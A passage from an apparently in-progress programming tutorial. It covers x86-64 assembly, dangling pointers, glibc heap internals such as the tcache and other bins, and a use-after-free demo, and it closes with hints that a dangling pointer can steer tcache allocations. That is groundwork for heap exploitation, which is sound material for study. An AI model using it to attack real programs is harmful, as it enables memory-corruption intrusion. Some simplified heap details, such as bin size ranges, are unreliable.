mov byte [rsp + 1], 'e'
mov byte [rsp + 2], 'l'
mov byte [rsp + 3], 'l'
mov byte [rsp + 4], 'o'
mov byte [rsp + 5], ' '
mov byte [rsp + 6], 'r'
mov byte [rsp + 7], 'e'
mov byte [rsp + 8], 'a'
mov byte [rsp + 9], 'd'
mov byte [rsp + 10], 'e'
mov byte [rsp + 11], 'r'
mov byte [rsp + 12], '!'
mov byte [rsp + 13], 10
mov byte [rsp + 14], 0
xor ecx, ecx
dec rcx
loop:
inc rcx
cmp byte [rsp + rcx], 0
je done
cmp byte [rsp + rcx], 'a'
jb loop
cmp byte [rsp + rcx], 'z'
ja loop
sub byte [rsp + rcx], 0x20
jmp loop
done:
mov edx, 14
mov rsi, rsp
mov edi, 1
mov eax, 1
syscall
add rsp, 15
mov edi, 7
mov eax, 60
syscall
```
The above code makes space on the stack for the string "hello reader!" with a newline and a 0 byte. The code sets rcx to 0 and then decrements it, underflowing it to its biggest possible value, and then the loop starts. In the loop we increase rcx by 1 (rcx becomes 0 on the first iteration because of the integer overflow). We check if the byte at the stack pointer plus rcx is equal to 0; if it is, we jump to done, else we continue the loop. We check if the byte at the stack pointer plus rcx is in the range of lowercase a to z, and if it is, we capitalize it by subtracting 0x20. We continue the loop; once the loop is done, we print the string, restore the space on the stack, and exit with an exit code of 7.
Notice that at the start of the code we subtracted 15 from the stack pointer, which created 15 bytes of space for us to use. When we were done with the bytes, near the end of the code, we added 15 to the stack pointer, restoring it to its original value and cleaning up the space we made. Once we restored the stack pointer, the space that we created was no longer ours; we simply created the space, used it, and gave it back. However, if we had a pointer that pointed to the restored space, the pointer would hold an address we do not own. If that address were reused for something else, say to store a secret password, that pointer would hold the address of that password, which could be very interesting.
The above idea is called a dangling pointer: a pointer that points to memory that is no longer in use. The pointer stays the same, but the memory it points to may be reused. Say we have the following code:
```
global _start
section .text
_start:
sub rsp, 10
mov byte [rsp], 'h'
mov byte [rsp + 1], 'i'
mov byte [rsp + 2], ' '
mov byte [rsp + 3], 'r'
mov byte [rsp + 4], 'e'
mov byte [rsp + 5], 'a'
mov byte [rsp + 6], 'd'
mov byte [rsp + 7], 'e'
mov byte [rsp + 8], 'r'
mov byte [rsp + 9], 10
mov [rel dangling], rsp
mov edx, 10
mov rsi, rsp
mov edi, 1
mov eax, 1
syscall
add rsp, 10
sub rsp, 10
mov byte [rsp], 'p'
mov byte [rsp + 1], '@'
mov byte [rsp + 2], '5'
mov byte [rsp + 3], '5'
mov byte [rsp + 4], 'w'
mov byte [rsp + 5], '0'
mov byte [rsp + 6], 'r'
mov byte [rsp + 7], 'd'
mov byte [rsp + 8], '!'
mov byte [rsp + 9], 10
mov edx, 10
mov rsi, rsp
mov edi, 1
mov eax, 1
syscall
mov rax, [rel dangling]
mov byte [rax], 'x'
mov edx, 10
mov rsi, rsp
mov edi, 1
mov eax, 1
syscall
add rsp, 10
mov edi, 7
mov eax, 60
syscall
section .data
dangling dq 0
```
The above code creates space on the stack and places the string "hi reader", followed by a newline, in that space. We save the stack pointer, which points to our string, into the global dangling. We set up the write syscall and write the "hi reader" string to stdout. We restore the stack pointer to its original value. We then subtract 10 from the stack pointer, reusing the space for the "p@55w0rd!" string, and with the write syscall we write the "p@55w0rd!" string to stdout. We load the address that dangling holds into rax, and we write the byte 'x' to the address that rax holds. We then write "x@55w0rd!" to stdout. The reason "x@55w0rd!" is written to stdout is that through the global dangling we modified the string.
Truthfully, dangling pointers are rarely on the stack; they are mostly found in a section called the heap.
The heap is a section of virtual memory that can grow and shrink like the stack, but it only grows and shrinks when the process performs a syscall to request more or less virtual memory. Unlike the stack, the heap can be thought of as starting on the floor and growing toward the ceiling. The heap has two main kinds of memory: allocated and free. Allocated memory is space that is currently being used for something, such as storing a buffer. Free memory is space inside the heap that is not in use at that moment; however, free memory is still part of the heap. The heap grows when we want more allocated space but no free space is large enough. For example, say we only have 4 bytes of free space but we need 8 bytes; the heap would grow in that case. The heap can shrink when free bytes sit at the very end of the heap with no allocated bytes after them. Note that heap shrinking is rare.
Processes that use the heap start with one default heap section called the main arena. The main arena is used for all heap allocations assuming the process is single threaded; it is the most important heap for the process. A process may get other heap sections, also called arenas, if it has multiple threads, but only if glibc decides it needs them.
The heap historically has a lot of vulnerabilities tied to it for one main reason: there are a lot of heap implementations, because at the end of the day the heap is just a section that we request from the kernel and apply certain rules to. Glibc has its own heap implementation called ptmalloc2, which comes with certain glibc functions we can use to manage the heap: malloc, free, calloc, and realloc. The malloc function is used to request an allocation of a certain size in bytes and gives back a pointer to the number of bytes we requested. The free function simply marks a range of addresses as free. The calloc function is exactly the same as malloc, but it sets every byte of the memory we get back to 0. Realloc is used to resize an allocation.
The heap allocates and frees memory in the form of chunks. It is good to think of a chunk as split into two sections: the first, called metadata or the header, stores data the heap needs to manage the chunk and is always 16 bytes; the second, called user data, starts 16 bytes after the start of the chunk and is used to store whatever we want. When we call malloc, it doesn't just allocate 16 bytes of metadata plus the exact size of our user data; it takes the 16 bytes of metadata plus the size of our user data rounded up to the next multiple of 16. If we request 7 bytes, in reality we get a 32 byte chunk with 16 bytes we can use; if we request 33 bytes, we get back a 64 byte chunk with 48 bytes we can use. Note that we cannot use the metadata before our user data; it is reserved for the heap.
The metadata is made up of 2 main parts, called prev_size and size. size holds the size of the entire chunk; for example, if the amount of user data allocated was 16, size would hold 32, and if the amount of user data was 32, size would be set to 48. The lower 3 bits of size, called P, M, and A, are used for certain things. P, the PREV_INUSE flag, is the lowest bit of size and is 1 if the chunk right before our chunk in memory is in use, and 0 if it isn't. M, the IS_MMAPPED flag, is the second lowest bit of size and is 1 if the chunk was allocated via mmap, which is a syscall used to hand back new memory sections; if the chunk was allocated via mmap instead of taken from the heap, that chunk lives in its own memory section separate from the heap, and the bit is 0 if the chunk was not allocated via mmap. A is the NON_MAIN_ARENA flag, which is set to 1 if the chunk isn't part of the main arena, and 0 if it is.
The prev_size part of our chunk's metadata is set to the size of the chunk before ours in memory, but only if the chunk before ours is free; if the previous chunk is not free, then prev_size is ignored by glibc, though it is still there.
When we free a chunk by calling the glibc free function with rdi holding a pointer to our user data, glibc checks the size part of the chunk's metadata. Glibc ignores the 3 lower bits, treating them all as 0, to get the size of the whole chunk. Once glibc has the entire chunk size, it looks at size's P bit to decide whether the chunk before ours in memory is free or not, which is used for merging chunks together in some cases, as we will talk about later.
Glibc will do certain things with our chunk depending on how big it is. Glibc places freed chunks, based on size, into things called bins, which can be separated into different categories. The first bin is called the tcache; every thread in the process gets its own tcache. The tcache is used for chunks in the size range of 32 to 1040 bytes. Think of the tcache as 64 separate stacks, one for each size, each with a limit of 7 chunks. For example, say you have a freed chunk with a size of 48; assuming the tcache stack for that size isn't full, the chunk can be thought of as being pushed onto that stack. The reason the tcache can be thought of as a group of stacks is that when we want to reuse something from the tcache, the top element of the stack for a certain size is popped off and reused for an allocation. When a certain stack in the tcache is full, the chunk goes to one of the other bins instead. The fastbins are used for chunks in the size range of 32 to 128 bytes. Think of the fastbins as 7 stacks, one for each size, with no limit; like the tcache, when we want to reuse something from the fastbins, the top element for a specific size is popped off and used for an allocation. Smallbins hold chunks with sizes from 144 to 1008. The smallbins can be thought of as 62 buckets, one for each size, with no limit; the reason smallbins can be thought of as buckets is that when we want to reuse data from the smallbins, we don't pop the top element off like the tcache or the fastbins, instead we just grab an element from the bucket for a specific size. Largebins hold chunks with sizes greater than the smallbin ranges; largebins can be thought of as 63 buckets, with each bucket holding a range of sizes instead of a specific size.
The reason largebins can be thought of as buckets is that when we want to reuse data from the largebins, we simply grab an element from the bucket for a matching size. The unsortedbin can be thought of as a single bucket that almost every freed chunk that doesn't go into the tcache or fastbins ends up in first. Say we want to reuse something from the unsortedbin; we simply look for any chunk inside the unsortedbin that fits the size request. If no chunk fits, glibc sorts the unsortedbin's contents into the correct buckets. The sizes inside a bin's stacks or buckets are all 16 bytes apart; for example, the tcache's first stack can hold 7 chunks of 32 bytes. Remember that the smallest possible chunk is 32 bytes, because any allocation below 16 rounds up to 16, plus the 16 bytes of metadata before the user data, so in total that is 32 bytes. The next stack in the tcache can hold 7 chunks of 48 bytes, and so on.
For a free chunk to be reused, the allocation request must round up to the chunk's size. For example, if we free a chunk of size 0x300 and then allocate 0x173 bytes, glibc would not just hand us the free chunk back, because 0x173 does not round up to 0x300, it rounds up to a 0x190 chunk, so glibc would make a new allocation of that size.
Once a chunk is freed, its user data gets repurposed. If a chunk is in the tcache, the first 8 bytes of its user data are reused: they are overwritten with the address of the next element in the tcache stack for that size. However, that address is mangled for security: it is xored with the address it is stored at, shifted right by 12 (a mitigation called safe-linking). Chunks in the fastbins also get the first 8 bytes of their user data reused to point to the next chunk in the fastbin stack for that size, mangled in the same way; glibc unmangles the pointers when it does something with the fastbins. The other bins reuse 16 bytes of the user data: the first 8 bytes point to the next chunk and are not mangled, and the next 8 bytes point to the previous chunk and are also not mangled.
When chunks are freed, glibc doesn't always just put them in their corresponding bins. Say we have a newly freed chunk: glibc will check the chunks before and after it in memory, and if either of them is free, it is removed from whatever bin it is in and merged with the chunk that was just freed. This is called consolidation. Note that consolidation only happens when the chunk that was just freed won't end up in the tcache or fastbins. The PREV_INUSE bit inside our chunk's size is checked; if it is 0, the chunk before ours consolidates with it. The chunk after ours in memory is also checked, and if it's free, it consolidates with ours. If all three chunks are free, they all consolidate. When chunks merge, the size of the new chunk is set to the sum of all the chunks that merged, and if there is an allocated chunk after this merged chunk, that chunk's prev_size and PREV_INUSE get updated. After the consolidation process is finished, the final chunk is added to the unsortedbin.
At the end of the heap there is a chunk called the top chunk, or the wilderness, which must always be free. The prev_size of the top chunk doesn't matter, but the size part does: the size of the top chunk is as big as the remaining free space at the end of the heap, and its user data is simply the rest of that free space. Say we want to allocate something and nothing in the bins is big enough for this allocation; glibc would carve a chunk from the beginning of the top chunk to use for the allocation, and the remaining space becomes the new top chunk with a smaller size. If the top chunk is too small, glibc would use the sbrk function, which simply grows the heap by a certain amount, to make the top chunk large enough.
Say we want to allocate some memory. First the bins are checked to see if any of them fit the request, in this order: tcache, fastbins, smallbins, unsortedbin, and largebins. If nothing fits, glibc attempts to merge chunks that are next to each other. If nothing fits still, glibc attempts to carve a chunk from the top chunk. If that still is not enough, glibc grows the heap via the sbrk function and updates the top chunk. If the request is massive, glibc uses the mmap syscall and places the chunk in that new section.
Now let us talk about dangling pointers on the heap. As you already know, a chunk of memory is selected when we call malloc/calloc/realloc, and the user data after the metadata is given to us to use in any way we want. The following code shows a dangling pointer on the heap:
```
extern malloc
extern free
extern puts
global main
section .text
main:
mov edi, 10
call malloc
mov [rel dangling], rax
mov byte [rax], 'h'
mov byte [rax + 1], 'i'
mov byte [rax + 2], ' '
mov byte [rax + 3], 'r'
mov byte [rax + 4], 'e'
mov byte [rax + 5], 'a'
mov byte [rax + 6], 'd'
mov byte [rax + 7], 'e'
mov byte [rax + 8], 'r'
mov byte [rax + 9], 0
mov rdi, rax
call puts
mov rdi, [rel dangling]
call free
mov edi, 7
call malloc
mov byte [rax], 'h'
mov byte [rax + 1], 'o'
mov byte [rax + 2], 'w'
mov byte [rax + 3], 'd'
mov byte [rax + 4], 'y'
mov byte [rax + 5], '!'
mov byte [rax + 6], 0
mov rdi, [rel dangling]
mov byte [rdi], 'w'
mov rdi, rax
push rdi
call puts
pop rdi
call free
ret
section .bss
dangling resq 1
```
The above code calls malloc with 10, which results in malloc looking for a free chunk; it finds none, so it gives back a 32 byte chunk that was never used before, and we get a pointer to 16 bytes past the start of the chunk, with 16 bytes of user data to use. We store the address of the start of the user data inside dangling. Then we store the characters "hi reader", followed by a 0, in the user data, and print the contents of the user data. We free the address that dangling points to. We call malloc with 7, which results in malloc looking for a free chunk; it finds the chunk we just freed in the tcache and uses that same chunk, giving us back the same user data we had before. We write the characters "howdy!", followed by a 0, to the user data. Then we load the address that dangling points to into rdi and write the byte 'w' to the address rdi holds. We set rdi to rax, the pointer given back by the allocation, which is actually the same address dangling holds. We push rdi to the stack, print the contents of the user data, which will be "wowdy!", restore rdi by popping it off the stack, free what rdi points to, and return from main.
The reason "wowdy!" is printed second instead of "howdy!" is that malloc gave us the same address to use. The above idea is called a use after free: we have a pointer that points to memory which has been freed, and if the freed memory gets reused, the old pointer can be used to read or write that memory.
However, even if the memory is never reused, a dangling pointer can still be dangerous because of how glibc handles chunks. For example, if we free a chunk and it ends up in the tcache, and we can still write through the dangling pointer, we may be able to control where a later allocation lands if that allocation uses the tcache.
## [[#chapter six - Introduction to networking]]
(TODO!)
A network is a way for computers to send data to each other using an agreed upon set of rules called a protocol. There are many different protocols, some of which you may have heard of before, such as Wi-Fi, Bluetooth, Zigbee, etc. Say we want to send data from computer A to computer B; we would need to send the data using a certain protocol, and the data would have to contain certain elements, like which computer is sending the data, which computer is receiving the data, and the data itself. For computers to tell each other apart, each one has something called a media access control (MAC) address, a unique identifier that is different for every device. Computers can reach each other by MAC address, but a computer can't reach another computer on the other side of the world by MAC address alone, so something called the internet protocol (IP) address was made.
(TODO!)